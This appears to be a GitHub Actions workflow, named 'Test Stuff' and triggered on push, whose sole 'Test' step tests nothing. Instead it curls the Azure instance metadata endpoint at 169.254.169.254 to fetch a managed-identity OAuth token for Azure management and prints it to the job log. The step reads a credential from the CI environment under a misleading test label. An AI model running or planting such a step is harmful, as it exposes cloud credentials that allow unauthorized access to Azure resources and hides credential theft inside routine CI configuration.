name: Test Stuff
on: push

jobs:
  test:
     runs-on: ubuntu-20.04
     steps:
      - name: Test
        run: |
          curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
